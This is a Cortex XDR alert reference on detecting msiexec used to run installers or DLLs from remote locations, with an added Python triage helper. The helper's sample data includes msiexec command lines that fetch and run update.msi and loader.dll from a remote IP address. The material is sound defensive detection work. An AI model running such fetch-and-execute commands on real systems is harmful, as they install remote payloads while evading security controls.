Msiexec execution of an executable from an uncommon remote location

Cortex XDR Analytics Alert Reference by Alert name

Product
Cortex XDR
Last date published
2024-06-04
Category
Analytics Alert Reference

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

7 Days

Required Data

  • Requires:
    • XDR Agent

Detection Modules

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

Informational

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check the execution of msiexec and the IP address or domain that was used.
  • Is the URL encoded in the command line trusted?
  • Is the executed DLL or MSI file known to be legitimate?
  • Is the initiating process legitimate, and does the user running it know of its use?

Variations

Msiexec execution of an executable from an uncommon remote location with a specific port

Synopsis

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

High

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check the execution of msiexec and the IP address or domain that was used.
  • Is the URL encoded in the command line trusted?
  • Is the executed DLL or MSI file known to be legitimate?
  • Is the initiating process legitimate, and does the user running it know of its use?


Msiexec execution of an executable from an uncommon remote location without properties

Synopsis

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

Medium

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations. Execution without properties is more common in malware.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check the execution of msiexec and the IP address or domain that was used.
  • Is the URL encoded in the command line trusted?
  • Is the executed DLL or MSI file known to be legitimate?
  • Is the initiating process legitimate, and does the user running it know of its use?
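As an added example (not part of this alert reference and not Palo Alto Networks' detection logic), the following Python helper applies the investigative actions listed for the base alert and both variations to msiexec command lines: it extracts the remote URL with its host and port, records whether the port was given explicitly and whether any installer properties (KEY=VALUE) are present, checks the host against an allow-list, and maps the result onto the three alert names on this page with their stated severities. The sample command lines, the trusted-host list and the precedence between the two variations are constructed assumptions for illustration.

```python
"""Triage helper for msiexec command lines (added example; assumptions are marked)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# Assumption: package hosts this organisation has vetted as legitimate sources.
TRUSTED_HOSTS = {"updates.example-corp.internal"}

# Severities exactly as stated on this page for the base alert and its variations.
SEVERITY = {
    "remote location": "Informational",
    "remote location with a specific port": "High",
    "remote location without properties": "Medium",
}

# One token per whitespace-separated argument; quoted spans stay whole.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
PROPERTY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}


@dataclass
class Finding:
    cmdline: str
    is_msiexec: bool = False
    url: Optional[str] = None
    host: Optional[str] = None
    port: Optional[int] = None
    explicit_port: bool = False
    payload_ext: Optional[str] = None          # "msi", "dll", ... taken from the URL path
    properties: List[str] = field(default_factory=list)
    trusted_host: bool = False
    variation: Optional[str] = None            # None when the package is not remote
    severity: Optional[str] = None


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans together."""
    return [m.group(0).replace('"', "") for m in TOKEN_RE.finditer(cmdline)]


def triage(cmdline: str) -> Finding:
    """Answer the page's investigative questions for one process command line."""
    f = Finding(cmdline=cmdline)
    tokens = tokenize(cmdline)
    if not tokens:
        return f
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    f.is_msiexec = image in ("msiexec", "msiexec.exe")
    if not f.is_msiexec:
        return f

    for tok in tokens[1:]:
        if tok.startswith(("/", "-")):
            continue                            # a switch such as /i, /qn or /y
        if f.url is None and URL_RE.match(tok):
            f.url = tok                         # the remote location the alert keys on
            continue
        if PROPERTY_RE.match(tok):
            f.properties.append(tok.split("=", 1)[0].upper())

    if f.url is None:
        return f                                # local package: outside this alert's scope

    parts = urlsplit(f.url)
    f.host = (parts.hostname or "").lower()
    f.explicit_port = parts.port is not None
    f.port = parts.port if f.explicit_port else DEFAULT_PORTS.get(parts.scheme.lower())
    filename = parts.path.rsplit("/", 1)[-1]
    f.payload_ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else None
    f.trusted_host = f.host in TRUSTED_HOSTS

    # Assumption: a command line matching both variations is reported under the
    # higher-severity one; the page does not state a precedence.
    if f.explicit_port:
        f.variation = "remote location with a specific port"
    elif not f.properties:
        f.variation = "remote location without properties"
    else:
        f.variation = "remote location"
    f.severity = SEVERITY[f.variation]
    return f


# Constructed sample command lines (not real telemetry); 203.0.113.0/24 is documentation space.
SAMPLE_CMDLINES = [
    r'msiexec.exe /qn /i https://updates.example-corp.internal/tools/agent.msi ALLUSERS=1 INSTALLDIR="C:\Program Files\Agent"',
    r"C:\Windows\System32\msiexec.exe /q /i http://203.0.113.10:8080/update.msi",
    r"msiexec /y http://203.0.113.10/lib/loader.dll",
    r"msiexec /i C:\Temp\setup.msi /qn",
    r"notepad.exe http://example.test/notes.msi",
]


def remote_findings(cmdlines: List[str]) -> List[Finding]:
    """Keep only msiexec executions that reference a remote location."""
    return [f for f in map(triage, cmdlines) if f.is_msiexec and f.url]


if __name__ == "__main__":
    for f in remote_findings(SAMPLE_CMDLINES):
        trust = "trusted" if f.trusted_host else "UNTRUSTED"
        print(f"{f.severity:13} {f.variation:40} host={f.host} port={f.port} "
              f"({trust}) payload={f.payload_ext} properties={f.properties}")
```

The helper answers the four investigative questions in order: which host was contacted and on which port, whether that host is on the allow-list, what kind of file was fetched (by extension), and whether the command line carries installer properties; the initiating process and user still have to be read from the process tree in the alert itself.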